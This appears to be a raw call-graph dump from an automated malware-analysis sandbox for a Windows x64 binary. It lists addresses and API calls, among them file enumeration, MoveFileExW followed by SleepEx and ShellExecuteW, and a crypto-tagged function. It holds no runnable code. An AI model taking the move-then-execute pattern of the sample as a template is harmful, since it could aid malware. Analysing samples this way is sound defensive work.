25579->25577 25581 7ff6e4c6d4e8 92 API calls 25579->25581 25580->25576 25602 7ff6e4c68d14 64 API calls 3 library calls 25580->25602 25581->25577 25584 7ff6e4c6d42c 25583->25584 25585 7ff6e4c6d449 25584->25585 25588 7ff6e4c6d475 25584->25588 25615 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25585->25615 25587 7ff6e4c6d44e 25616 7ff6e4c6a5d8 30 API calls _invalid_parameter_noinfo 25587->25616 25590 7ff6e4c6d47a 25588->25590 25591 7ff6e4c6d487 25588->25591 25617 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25590->25617 25603 7ff6e4c76d40 25591->25603 25594 7ff6e4c6d459 25594->25580 25596 7ff6e4c6d49b 25618 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25596->25618 25597 7ff6e4c6d4a8 25610 7ff6e4c7b570 25597->25610 25600 7ff6e4c6d4bc 25619 7ff6e4c69770 LeaveCriticalSection 25600->25619 25602->25576 25620 7ff6e4c6e128 EnterCriticalSection 25603->25620 25605 7ff6e4c76d57 25606 7ff6e4c76db4 16 API calls 25605->25606 25607 7ff6e4c76d62 25606->25607 25608 7ff6e4c6e17c _isindst LeaveCriticalSection 25607->25608 25609 7ff6e4c6d491 25608->25609 25609->25596 25609->25597 25621 7ff6e4c7b2ac 25610->25621 25613 7ff6e4c7b5ca 25613->25600 25615->25587 25616->25594 25617->25594 25618->25594 25622 7ff6e4c7b2d6 25621->25622 25623 7ff6e4c7b489 25622->25623 25636 7ff6e4c83790 38 API calls 3 library calls 25622->25636 25627 7ff6e4c7b492 25623->25627 25639 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25623->25639 25625 7ff6e4c7b54f 25640 7ff6e4c6a5d8 30 API calls _invalid_parameter_noinfo 25625->25640 25627->25613 25633 7ff6e4c83ffc 25627->25633 25629 7ff6e4c7b4ea 25629->25623 25637 7ff6e4c83790 38 API calls 3 library calls 25629->25637 25631 7ff6e4c7b50b 25631->25623 25638 7ff6e4c83790 38 API calls 3 library calls 25631->25638 25641 7ff6e4c838bc 25633->25641 25636->25629 25637->25631 25638->25623 25639->25625 25640->25627 25642 7ff6e4c838d3 25641->25642 25643 7ff6e4c838f1 25641->25643 25663 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25642->25663 25643->25642 25645 7ff6e4c8390d 25643->25645 25652 7ff6e4c83ee4 25645->25652 25646 7ff6e4c838d8 25664 7ff6e4c6a5d8 30 API calls _invalid_parameter_noinfo 25646->25664 25650 7ff6e4c838e4 25650->25613 25666 7ff6e4c686f4 25652->25666 25657 7ff6e4c83f47 25674 7ff6e4c6c624 25657->25674 25659 7ff6e4c83f9f 25661 7ff6e4c83938 25659->25661 25744 7ff6e4c76b28 13 API calls _get_daylight 25659->25744 25661->25650 25665 7ff6e4c7ac04 LeaveCriticalSection 25661->25665 25663->25646 25664->25650 25667 7ff6e4c68718 25666->25667 25673 7ff6e4c68713 25666->25673 25667->25673 25745 7ff6e4c75ac4 33 API calls 3 library calls 25667->25745 25669 7ff6e4c68733 25746 7ff6e4c75d6c 33 API calls _Getctype 25669->25746 25671 7ff6e4c68756 25747 7ff6e4c75da0 33 API calls TranslateName 25671->25747 25673->25657 25743 7ff6e4c778dc 5 API calls try_get_function 25673->25743 25675 7ff6e4c6c64d 25674->25675 25676 7ff6e4c6c66f 25674->25676 25677 7ff6e4c6c65b 25675->25677 25748 7ff6e4c76b28 13 API calls _get_daylight 25675->25748 25678 7ff6e4c6c6c8 25676->25678 25679 7ff6e4c6c673 25676->25679 25677->25659 25700 7ff6e4c84030 25677->25700 25751 7ff6e4c7a73c MultiByteToWideChar 25678->25751 25679->25677 25682 7ff6e4c6c687 25679->25682 25683 7ff6e4c6c67e 25679->25683 25750 7ff6e4c782bc 14 API calls 3 library calls 25682->25750 25749 7ff6e4c76b28 13 API calls _get_daylight 25683->25749 25689 7ff6e4c6c694 25689->25677 25752 7ff6e4c83c14 25700->25752 25703 7ff6e4c840bd 25772 7ff6e4c7ac2c 25703->25772 25704 7ff6e4c840a5 25784 7ff6e4c6c834 13 API calls _invalid_parameter_noinfo 25704->25784 25715 7ff6e4c840b6 25715->25659 25723 7ff6e4c840aa 25785 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25723->25785 25743->25657 25744->25661 25745->25669 25746->25671 25747->25673 25748->25677 25749->25682 25750->25689 25753 7ff6e4c83c5a 25752->25753 25754 7ff6e4c83c40 25752->25754 25759 7ff6e4c83cda 25753->25759 25799 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25753->25799 25754->25753 25797 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25754->25797 25756 7ff6e4c83c4f 25798 7ff6e4c6a5d8 30 API calls _invalid_parameter_noinfo 25756->25798 25758 7ff6e4c83d2e 25768 7ff6e4c83d8a 25758->25768 25803 7ff6e4c72b1c 30 API calls 2 library calls 25758->25803 25759->25758 25801 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 25759->25801 25762 7ff6e4c83d86 25765 7ff6e4c83e08 25762->25765 25762->25768 25763 7ff6e4c83d23 25802 7ff6e4c6a5d8 30 API calls _invalid_parameter_noinfo 25763->25802 25804 7ff6e4c6a628 17 API calls BuildCatchObjectHelperInternal 25765->25804 25767 7ff6e4c83ccf 25800 7ff6e4c6a5d8 30 API calls _invalid_parameter_noinfo 25767->25800 25768->25703 25768->25704 25805 7ff6e4c6e128 EnterCriticalSection 25772->25805 25784->25723 25785->25715 25797->25756 25798->25753 25799->25767 25800->25759 25801->25763 25802->25758 25803->25762 25806 7ff6e4c47100 25807 7ff6e4c47138 25806->25807 25845 7ff6e4c4a820 25807->25845 25809 7ff6e4c47165 25859 7ff6e4c609d4 25809->25859 25812 7ff6e4c47615 25903 7ff6e4c43a80 70 API calls Concurrency::cancel_current_task 25812->25903 25813 7ff6e4c471f3 25819 7ff6e4c4a820 32 API calls 25813->25819 25835 7ff6e4c47247 25813->25835 25815 7ff6e4c47627 25822 7ff6e4c43a80 70 API calls 25815->25822 25816 7ff6e4c47610 25818 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25816->25818 25817 7ff6e4c623b0 _handle_errorf 8 API calls 25821 7ff6e4c475f7 25817->25821 25818->25812 25820 7ff6e4c47282 25819->25820 25899 7ff6e4c4b4d0 25820->25899 25824 7ff6e4c4763b 25822->25824 25827 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25824->25827 25825 7ff6e4c472a1 25825->25815 25826 7ff6e4c472a9 25825->25826 25826->25824 25838 7ff6e4c472e6 25826->25838 25828 7ff6e4c47641 25827->25828 25829 7ff6e4c43a80 70 API calls 25828->25829 25830 7ff6e4c47656 25829->25830 25831 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25830->25831 25832 7ff6e4c4765b 25831->25832 25833 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25832->25833 25834 7ff6e4c47661 25833->25834 25837 7ff6e4c43990 69 API calls 25834->25837 25835->25817 25836 7ff6e4c609d4 51 API calls 25836->25838 25839 7ff6e4c47669 25837->25839 25838->25828 25838->25830 25838->25832 25838->25834 25838->25835 25838->25836 25841 7ff6e4c49c50 32 API calls 25838->25841 25842 7ff6e4c43ea0 FindNextFileW GetLastError 25838->25842 25844 7ff6e4c4b8a0 32 API calls 25838->25844 25840 7ff6e4c4b240 68 API calls 25839->25840 25843 7ff6e4c47685 25840->25843 25841->25838 25842->25838 25844->25838 25848 7ff6e4c4a841 _Yarn 25845->25848 25850 7ff6e4c4a87a 25845->25850 25846 7ff6e4c4a990 25905 7ff6e4c41300 32 API calls __std_exception_copy 25846->25905 25848->25809 25849 7ff6e4c4a996 25850->25846 25851 7ff6e4c4a98a 25850->25851 25853 7ff6e4c4a8ed 25850->25853 25854 7ff6e4c4a915 25850->25854 25904 7ff6e4c41260 32 API calls 2 library calls 25851->25904 25853->25851 25855 7ff6e4c623d8 std::_Facet_Register 32 API calls 25853->25855 25856 7ff6e4c623d8 std::_Facet_Register 32 API calls 25854->25856 25857 7ff6e4c4a902 _Yarn 25854->25857 25855->25857 25856->25857 25858 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25857->25858 25858->25851 25863 7ff6e4c60a0b 25859->25863 25860 7ff6e4c60a14 25861 7ff6e4c623b0 _handle_errorf 8 API calls 25860->25861 25864 7ff6e4c4718e 25861->25864 25862 7ff6e4c60ab6 25906 7ff6e4c60c70 CreateFileW GetLastError 25862->25906 25863->25860 25863->25862 25866 7ff6e4c60a64 GetFileAttributesExW 25863->25866 25864->25812 25864->25813 25864->25816 25867 7ff6e4c60a77 GetLastError 25866->25867 25868 7ff6e4c60a82 25866->25868 25867->25860 25868->25860 25868->25862 25869 7ff6e4c60ad8 25870 7ff6e4c60ade 25869->25870 25872 7ff6e4c60afd 25869->25872 25871 7ff6e4c60ae8 CloseHandle 25870->25871 25886 7ff6e4c60af6 25870->25886 25875 7ff6e4c60c55 25871->25875 25871->25886 25876 7ff6e4c60b0c GetFileInformationByHandleEx 25872->25876 25881 7ff6e4c60b4b 25872->25881 25873 7ff6e4c60b9d 25878 7ff6e4c60bb7 GetFileInformationByHandleEx 25873->25878 25879 7ff6e4c60bf0 25873->25879 25874 7ff6e4c60b61 GetFileInformationByHandleEx 25874->25873 25877 7ff6e4c60b7c GetLastError 25874->25877 25907 7ff6e4c6e0c0 35 API calls 3 library calls 25875->25907 25876->25881 25882 7ff6e4c60b25 GetLastError 25876->25882 25877->25886 25887 7ff6e4c60b8a CloseHandle 25877->25887 25878->25879 25888 7ff6e4c60bcc GetLastError 25878->25888 25883 7ff6e4c60c3b 25879->25883 25884 7ff6e4c60c05 25879->25884 25881->25873 25881->25874 25885 7ff6e4c60b33 CloseHandle 25882->25885 25882->25886 25883->25886 25892 7ff6e4c60c41 CloseHandle 25883->25892 25884->25860 25890 7ff6e4c60c0b CloseHandle 25884->25890 25885->25886 25891 7ff6e4c60c66 25885->25891 25886->25860 25887->25886 25889 7ff6e4c60c5a 25887->25889 25888->25886 25893 7ff6e4c60bde CloseHandle 25888->25893 25908 7ff6e4c6e0c0 35 API calls 3 library calls 25889->25908 25890->25860 25890->25875 25910 7ff6e4c6e0c0 35 API calls 3 library calls 25891->25910 25892->25875 25892->25886 25893->25886 25896 7ff6e4c60c60 25893->25896 25909 7ff6e4c6e0c0 35 API calls 3 library calls 25896->25909 25898 7ff6e4c60c6c 25911 7ff6e4c49c50 25899->25911 25901 7ff6e4c4b50f 25923 7ff6e4c43b50 25901->25923 25904->25846 25905->25849 25906->25869 25907->25889 25908->25896 25909->25891 25910->25898 25913 7ff6e4c49c7d 25911->25913 25912 7ff6e4c49d3b 25937 7ff6e4c41260 32 API calls 2 library calls 25912->25937 25913->25912 25915 7ff6e4c49cf6 25913->25915 25916 7ff6e4c49ccf 25913->25916 25918 7ff6e4c49c8b _Yarn 25913->25918 25915->25918 25919 7ff6e4c623d8 std::_Facet_Register 32 API calls 25915->25919 25916->25912 25920 7ff6e4c623d8 std::_Facet_Register 32 API calls 25916->25920 25917 7ff6e4c49d41 25918->25901 25919->25918 25921 7ff6e4c49ce0 25920->25921 25921->25918 25922 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25921->25922 25922->25912 25924 7ff6e4c43b6d 25923->25924 25925 7ff6e4c4a820 32 API calls 25924->25925 25934 7ff6e4c43c6b 25924->25934 25926 7ff6e4c43bcc 25925->25926 25938 7ff6e4c42f20 25926->25938 25928 7ff6e4c43bda 25929 7ff6e4c43c18 25928->25929 25930 7ff6e4c43ca6 25928->25930 25955 7ff6e4c6092c 25929->25955 25932 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25930->25932 25933 7ff6e4c43cab 25932->25933 25936 7ff6e4c43c35 25936->25934 25966 7ff6e4c608ec FindNextFileW 25936->25966 25937->25917 25939 7ff6e4c42f3b 25938->25939 25940 7ff6e4c43066 25939->25940 25945 7ff6e4c42fac 25939->25945 25941 7ff6e4c4a820 32 API calls 25940->25941 25947 7ff6e4c4308b _Yarn 25940->25947 25941->25947 25942 7ff6e4c430bf 25943 7ff6e4c430d7 25942->25943 25948 7ff6e4c430fc 25942->25948 25946 7ff6e4c431d3 25943->25946 25951 7ff6e4c430e6 25943->25951 25944 7ff6e4c4304c 25944->25947 25953 7ff6e4c4a820 32 API calls 25944->25953 25945->25942 25945->25944 25971 7ff6e4c4b0e0 32 API calls 25946->25971 25947->25928 25948->25951 25969 7ff6e4c4c2a0 32 API calls 4 library calls 25948->25969 25951->25947 25970 7ff6e4c4c440 32 API calls 4 library calls 25951->25970 25953->25947 25956 7ff6e4c6094a FindClose 25955->25956 25957 7ff6e4c60957 FindFirstFileExW 25955->25957 25956->25957 25958 7ff6e4c609cd 25956->25958 25959 7ff6e4c609bb 25957->25959 25960 7ff6e4c6097e GetLastError 25957->25960 25972 7ff6e4c6e0c0 35 API calls 3 library calls 25958->25972 25959->25936 25962 7ff6e4c60989 25960->25962 25963 7ff6e4c6098e FindFirstFileExW 25960->25963 25962->25959 25962->25963 25963->25959 25965 7ff6e4c609b3 GetLastError 25963->25965 25964 7ff6e4c609d2 25965->25959 25967 7ff6e4c608fa 25966->25967 25968 7ff6e4c60901 GetLastError 25966->25968 25967->25936 25969->25951 25970->25947 25972->25964 25973 7ff6e4c443f0 25974 7ff6e4c44460 25973->25974 25974->25974 25975 7ff6e4c4a9a0 32 API calls 25974->25975 25976 7ff6e4c44475 25975->25976 26000 7ff6e4c50f20 25976->26000 25978 7ff6e4c44486 25980 7ff6e4c4473a 25978->25980 26022 7ff6e4c54230 105 API calls 25978->26022 25981 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25980->25981 25982 7ff6e4c44740 25981->25982 25985 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25982->25985 25983 7ff6e4c4458c 26023 7ff6e4c531d0 8 API calls _Yarn 25983->26023 25986 7ff6e4c44746 25985->25986 25987 7ff6e4c446a8 26024 7ff6e4c515d0 30 API calls 2 library calls 25987->26024 25988 7ff6e4c4a9a0 32 API calls 25993 7ff6e4c444ec 25988->25993 25990 7ff6e4c446c5 25991 7ff6e4c446f4 25990->25991 25996 7ff6e4c44734 25990->25996 25994 7ff6e4c623b0 _handle_errorf 8 API calls 25991->25994 25992 7ff6e4c4472f 25995 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25992->25995 25993->25982 25993->25983 25993->25988 25998 7ff6e4c44718 25994->25998 25995->25996 25999 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25996->25999 25997 7ff6e4c44595 25997->25987 25997->25992 25999->25980 26001 7ff6e4c623d8 std::_Facet_Register 32 API calls 26000->26001 26002 7ff6e4c50f47 26001->26002 26003 7ff6e4c50f61 26002->26003 26048 7ff6e4c50de0 73 API calls 26002->26048 26005 7ff6e4c623d8 std::_Facet_Register 32 API calls 26003->26005 26006 7ff6e4c50f73 26005->26006 26007 7ff6e4c49e00 69 API calls 26006->26007 26008 7ff6e4c50f98 26007->26008 26009 7ff6e4c49e00 69 API calls 26008->26009 26010 7ff6e4c50fa5 26009->26010 26011 7ff6e4c623d8 std::_Facet_Register 32 API calls 26010->26011 26012 7ff6e4c50fb6 26011->26012 26025 7ff6e4c56ac0 26012->26025 26014 7ff6e4c5101c 26015 7ff6e4c51025 26014->26015 26032 7ff6e4c54e90 26014->26032 26015->25978 26017 7ff6e4c51047 26040 7ff6e4c51330 26017->26040 26021 7ff6e4c51069 26022->25993 26023->25997 26024->25990 26026 7ff6e4c56b1b 26025->26026 26027 7ff6e4c56acc 26025->26027 26029 7ff6e4c57290 8 API calls 26026->26029 26049 7ff6e4c57290 26027->26049 26031 7ff6e4c56b20 26029->26031 26031->26014 26033 7ff6e4c54ee4 26032->26033 26034 7ff6e4c54eaa 26032->26034 26036 7ff6e4c54f3d _Yarn 26033->26036 26053 7ff6e4c562e0 8 API calls _Yarn 26033->26053 26034->26033 26037 7ff6e4c54f70 26034->26037 26036->26017 26038 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26037->26038 26039 7ff6e4c54f75 26038->26039 26039->26017 26054 7ff6e4c63f88 26040->26054 26042 7ff6e4c51058 26043 7ff6e4c641cc 26042->26043 26044 7ff6e4c641eb 26043->26044 26045 7ff6e4c64208 RtlPcToFileHeader 26043->26045 26044->26045 26046 7ff6e4c6422f _purecall 26045->26046 26047 7ff6e4c64220 26045->26047 26046->26021 26047->26046 26048->26003 26052 7ff6e4c572d5 _Yarn 26049->26052 26050 7ff6e4c623b0 _handle_errorf 8 API calls 26051 7ff6e4c56b13 26050->26051 26051->26014 26052->26050 26053->26036 26055 7ff6e4c63fa9 26054->26055 26057 7ff6e4c63fde _Yarn 26054->26057 26055->26057 26058 7ff6e4c74464 30 API calls 2 library calls 26055->26058 26057->26042 26058->26057 26059 7ff6e4c44ff0 26060 7ff6e4c4a9a0 32 API calls 26059->26060 26061 7ff6e4c4504a 26060->26061 26062 7ff6e4c4ab00 32 API calls 26061->26062 26063 7ff6e4c45065 26062->26063 26064 7ff6e4c4ab00 32 API calls 26063->26064 26065 7ff6e4c4507b 26064->26065 26068 7ff6e4c450c8 26065->26068 26082 7ff6e4c4c130 32 API calls 4 library calls 26065->26082 26067 7ff6e4c45126 ShellExecuteW 26069 7ff6e4c4515d 26067->26069 26068->26067 26083 7ff6e4c4c2a0 32 API calls 4 library calls 26068->26083 26071 7ff6e4c451d6 26069->26071 26072 7ff6e4c45254 26069->26072 26081 7ff6e4c4525f 26069->26081 26077 7ff6e4c45219 26071->26077 26078 7ff6e4c45259 26071->26078 26075 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26072->26075 26073 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26076 7ff6e4c45265 26073->26076 26074 7ff6e4c623b0 _handle_errorf 8 API calls 26079 7ff6e4c4523c 26074->26079 26075->26078 26077->26074 26080 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26078->26080 26080->26081 26081->26073 26082->26068 26083->26068 26084 7ff6e4c44750 26085 7ff6e4c44776 memcpy_s _Toupper 26084->26085 26154 7ff6e4c4b740 26085->26154 26087 7ff6e4c447b0 26088 7ff6e4c4ab00 32 API calls 26087->26088 26089 7ff6e4c447c6 26088->26089 26168 7ff6e4c49520 26089->26168 26091 7ff6e4c44f1a 26094 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26091->26094 26092 7ff6e4c44812 26092->26091 26093 7ff6e4c4a9a0 32 API calls 26092->26093 26095 7ff6e4c44f20 26092->26095 26096 7ff6e4c44905 26093->26096 26094->26095 26097 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26095->26097 26188 7ff6e4c4b100 26096->26188 26098 7ff6e4c44f26 26097->26098 26100 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26098->26100 26101 7ff6e4c44f2c 26100->26101 26102 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26101->26102 26104 7ff6e4c44f32 26102->26104 26107 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26104->26107 26109 7ff6e4c44f38 26107->26109 26112 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26109->26112 26111 7ff6e4c449b0 26114 7ff6e4c4a9a0 32 API calls 26111->26114 26115 7ff6e4c44f3e 26112->26115 26116 7ff6e4c449da 26114->26116 26119 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26115->26119 26117 7ff6e4c4ab00 32 API calls 26116->26117 26118 7ff6e4c449f6 26117->26118 26120 7ff6e4c4ab00 32 API calls 26118->26120 26121 7ff6e4c44f44 26119->26121 26122 7ff6e4c44a0c 26120->26122 26124 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26121->26124 26123 7ff6e4c44a5b 26122->26123 26231 7ff6e4c4c130 32 API calls 4 library calls 26122->26231 26126 7ff6e4c44aba 26123->26126 26232 7ff6e4c4c2a0 32 API calls 4 library calls 26123->26232 26127 7ff6e4c44f4a 26124->26127 26128 7ff6e4c4b740 32 API calls 26126->26128 26130 7ff6e4c44ac7 26128->26130 26131 7ff6e4c4ab00 32 API calls 26130->26131 26132 7ff6e4c44add 26131->26132 26132->26098 26133 7ff6e4c4ab00 32 API calls 26132->26133 26134 7ff6e4c44b72 memcpy_s 26133->26134 26135 7ff6e4c44b86 MultiByteToWideChar 26134->26135 26136 7ff6e4c4b740 32 API calls 26135->26136 26137 7ff6e4c44bc6 26136->26137 26138 7ff6e4c4ab00 32 API calls 26137->26138 26139 7ff6e4c44bdc memcpy_s 26138->26139 26139->26101 26140 7ff6e4c44c4b MultiByteToWideChar 26139->26140 26218 7ff6e4c69a50 MoveFileExW 26140->26218 26143 7ff6e4c44e32 26233 7ff6e4c49470 67 API calls 26143->26233 26145 7ff6e4c44cd4 26145->26104 26145->26109 26145->26115 26145->26121 26145->26143 26146 7ff6e4c44f0f 26145->26146 26147 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26146->26147 26148 7ff6e4c44f14 26147->26148 26151 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26148->26151 26149 7ff6e4c44e60 26149->26148 26150 7ff6e4c44ecc 26149->26150 26152 7ff6e4c623b0 _handle_errorf 8 API calls 26150->26152 26151->26091 26153 7ff6e4c44ef2 26152->26153 26158 7ff6e4c4b773 26154->26158 26167 7ff6e4c4b889 26154->26167 26156 7ff6e4c4b88f 26235 7ff6e4c41260 32 API calls 2 library calls 26156->26235 26157 7ff6e4c4b800 _Yarn 26157->26087 26158->26157 26160 7ff6e4c4b7e2 26158->26160 26161 7ff6e4c4b80e 26158->26161 26160->26156 26163 7ff6e4c623d8 std::_Facet_Register 32 API calls 26160->26163 26161->26157 26164 7ff6e4c623d8 std::_Facet_Register 32 API calls 26161->26164 26162 7ff6e4c4b895 26165 7ff6e4c4b7f7 26163->26165 26164->26157 26165->26157 26166 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26165->26166 26166->26167 26234 7ff6e4c41300 32 API calls __std_exception_copy 26167->26234 26169 7ff6e4c623d8 std::_Facet_Register 32 API calls 26168->26169 26170 7ff6e4c495ea 26169->26170 26236 7ff6e4c61144 26170->26236 26173 7ff6e4c4b100 72 API calls 26174 7ff6e4c49628 26173->26174 26175 7ff6e4c49673 26174->26175 26176 7ff6e4c42b00 32 API calls 26174->26176 26177 7ff6e4c623d8 std::_Facet_Register 32 API calls 26175->26177 26176->26175 26178 7ff6e4c496b0 26177->26178 26179 7ff6e4c61144 38 API calls 26178->26179 26180 7ff6e4c496c0 26179->26180 26181 7ff6e4c4974c 26180->26181 26182 7ff6e4c49800 26180->26182 26245 7ff6e4c4a630 30 API calls _handle_errorf 26181->26245 26183 7ff6e4c42b00 32 API calls 26182->26183 26187 7ff6e4c4977b 26183->26187 26185 7ff6e4c4975d 26246 7ff6e4c4bde0 66 API calls 5 library calls 26185->26246 26187->26092 26189 7ff6e4c60d0c std::_Lockit::_Lockit 6 API calls 26188->26189 26190 7ff6e4c4b132 26189->26190 26191 7ff6e4c4b200 26190->26191 26269 7ff6e4c42110 72 API calls 8 library calls 26190->26269 26192 7ff6e4c60d84 std::_Lockit::~_Lockit LeaveCriticalSection 26191->26192 26193 7ff6e4c4b20a 26192->26193 26195 7ff6e4c623b0 _handle_errorf 8 API calls 26193->26195 26198 7ff6e4c4492d 26195->26198 26196 7ff6e4c4b1d8 26196->26191 26197 7ff6e4c4b22f 26196->26197 26270 7ff6e4c41a20 32 API calls 2 library calls 26197->26270 26201 7ff6e4c4d2d0 26198->26201 26200 7ff6e4c4b234 26202 7ff6e4c4d31f 26201->26202 26271 7ff6e4c4d990 26202->26271 26204 7ff6e4c4d390 26206 7ff6e4c42b00 32 API calls 26204->26206 26205 7ff6e4c4d330 26205->26204 26209 7ff6e4c4d374 26205->26209 26282 7ff6e4c48ed0 26205->26282 26207 7ff6e4c44976 26206->26207 26212 7ff6e4c4a730 26207->26212 26209->26204 26211 7ff6e4c48ed0 49 API calls 26209->26211 26301 7ff6e4c4c910 32 API calls 4 library calls 26209->26301 26211->26209 26213 7ff6e4c4a74c 26212->26213 26214 7ff6e4c4497f 26212->26214 26329 7ff6e4c4a540 64 API calls _handle_errorf 26213->26329 26214->26111 26222 7ff6e4c42b00 26214->26222 26216 7ff6e4c4a783 26330 7ff6e4c68d14 64 API calls 3 library calls 26216->26330 26219 7ff6e4c69a64 GetLastError 26218->26219 26221 7ff6e4c44c91 SleepEx ShellExecuteW 26218->26221 26331 7ff6e4c6c7e4 13 API calls 2 library calls 26219->26331 26221->26145 26223 7ff6e4c42b16 26222->26223 26224 7ff6e4c42b0f 26222->26224 26223->26111 26225 7ff6e4c641cc Concurrency::cancel_current_task 2 API calls 26224->26225 26226 7ff6e4c42b24 26224->26226 26225->26226 26227 7ff6e4c641cc Concurrency::cancel_current_task 2 API calls 26226->26227 26228 7ff6e4c42b7d 26227->26228 26229 7ff6e4c63f88 __std_exception_copy 30 API calls 26228->26229 26230 7ff6e4c42bbd 26229->26230 26230->26111 26231->26123 26232->26123 26233->26149 26234->26156 26235->26162 26247 7ff6e4c60d0c 26236->26247 26238 7ff6e4c61166 26244 7ff6e4c61189 _Yarn 26238->26244 26251 7ff6e4c61340 26238->26251 26241 7ff6e4c6117e 26254 7ff6e4c61370 26241->26254 26242 7ff6e4c495fa 26242->26173 26258 7ff6e4c60d84 26244->26258 26245->26185 26246->26187 26248 7ff6e4c60d1b 26247->26248 26250 7ff6e4c60d20 26247->26250 26262 7ff6e4c6e198 6 API calls std::_Locinfo::_Locinfo_ctor 26248->26262 26250->26238 26252 7ff6e4c623d8 std::_Facet_Register 32 API calls 26251->26252 26253 7ff6e4c61352 26252->26253 26253->26241 26255 7ff6e4c61382 26254->26255 26256 7ff6e4c61395 26254->26256 26263 7ff6e4c61ca8 26255->26263 26256->26244 26259 7ff6e4c60d8f LeaveCriticalSection 26258->26259 26261 7ff6e4c60d98 26258->26261 26261->26242 26264 7ff6e4c61cdd 26263->26264 26265 7ff6e4c61cb6 RtlEncodePointer 26263->26265 26268 7ff6e4c71188 33 API calls BuildCatchObjectHelperInternal 26264->26268 26265->26256 26269->26196 26270->26200 26272 7ff6e4c4d9e7 26271->26272 26273 7ff6e4c4d9b9 26271->26273 26278 7ff6e4c4d9f5 26272->26278 26302 7ff6e4c4aea0 32 API calls 26272->26302 26274 7ff6e4c42b00 32 API calls 26273->26274 26275 7ff6e4c4d9d7 26274->26275 26275->26205 26277 7ff6e4c4db77 26277->26205 26278->26277 26279 7ff6e4c4b100 72 API calls 26278->26279 26280 7ff6e4c4da36 26279->26280 26280->26277 26281 7ff6e4c42b00 32 API calls 26280->26281 26281->26277 26283 7ff6e4c48f02 26282->26283 26284 7ff6e4c48f7d 26283->26284 26290 7ff6e4c48f12 26283->26290 26294 7ff6e4c48f98 _Yarn 26283->26294 26303 7ff6e4c69288 26284->26303 26285 7ff6e4c623b0 _handle_errorf 8 API calls 26287 7ff6e4c4915e 26285->26287 26287->26209 26288 7ff6e4c69288 47 API calls 26288->26294 26290->26285 26291 7ff6e4c490b7 26291->26290 26292 7ff6e4c49173 26291->26292 26293 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26292->26293 26295 7ff6e4c49178 26293->26295 26294->26288 26294->26291 26299 7ff6e4c490cf 26294->26299 26324 7ff6e4c4c910 32 API calls 4 library calls 26294->26324 26296 7ff6e4c491a4 26295->26296 26300 7ff6e4c48ed0 49 API calls 26295->26300 26296->26209 26297 7ff6e4c491bb 26297->26209 26299->26291 26325 7ff6e4c69dc4 33 API calls 3 library calls 26299->26325 26300->26297 26301->26209 26302->26278 26304 7ff6e4c692a4 26303->26304 26305 7ff6e4c692c2 26303->26305 26327 7ff6e4c6c854 13 API calls _invalid_parameter_noinfo 26304->26327 26326 7ff6e4c69764 EnterCriticalSection 26305->26326 26308 7ff6e4c692a9 26328 7ff6e4c6a5d8 30 API calls _invalid_parameter_noinfo 26308->26328 26309 7ff6e4c692c7 26311 7ff6e4c69377 26309->26311 26313 7ff6e4c74fcc _fread_nolock 30 API calls 26309->26313 26314 7ff6e4c6923c 44 API calls 26311->26314 26312 7ff6e4c692b4 26312->26290 26318 7ff6e4c692de 26313->26318 26315 7ff6e4c6937f 26314->26315 26316 7ff6e4c69770 _fread_nolock LeaveCriticalSection 26315->26316 26316->26312 26317 7ff6e4c6934c 26319 7ff6e4c6c854 _get_daylight 13 API calls 26317->26319 26318->26311 26318->26317 26320 7ff6e4c69351 26319->26320 26321 7ff6e4c6a5d8 _invalid_parameter_noinfo 30 API calls 26320->26321 26322 7ff6e4c6935c 26321->26322 26323 7ff6e4c86ea0 _local_unwind RtlUnwind 26322->26323 26323->26312 26324->26294 26325->26299 26327->26308 26328->26312 26329->26216 26330->26214 26331->26221 26332 7ff6e4c58230 26333 7ff6e4c5824f 26332->26333 26334 7ff6e4c5828d CreateFileA 26333->26334 26337 7ff6e4c582d1 26333->26337 26335 7ff6e4c582b6 26334->26335 26334->26337 26336 7ff6e4c582c8 CloseHandle 26335->26336 26335->26337 26336->26337

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 00007FF6E4C45930 Relevance: 37.5, APIs: 15, Strings: 6, Instructions: 763processCOMMONCrypto
                                                                                                                                                              Download Yara Rule

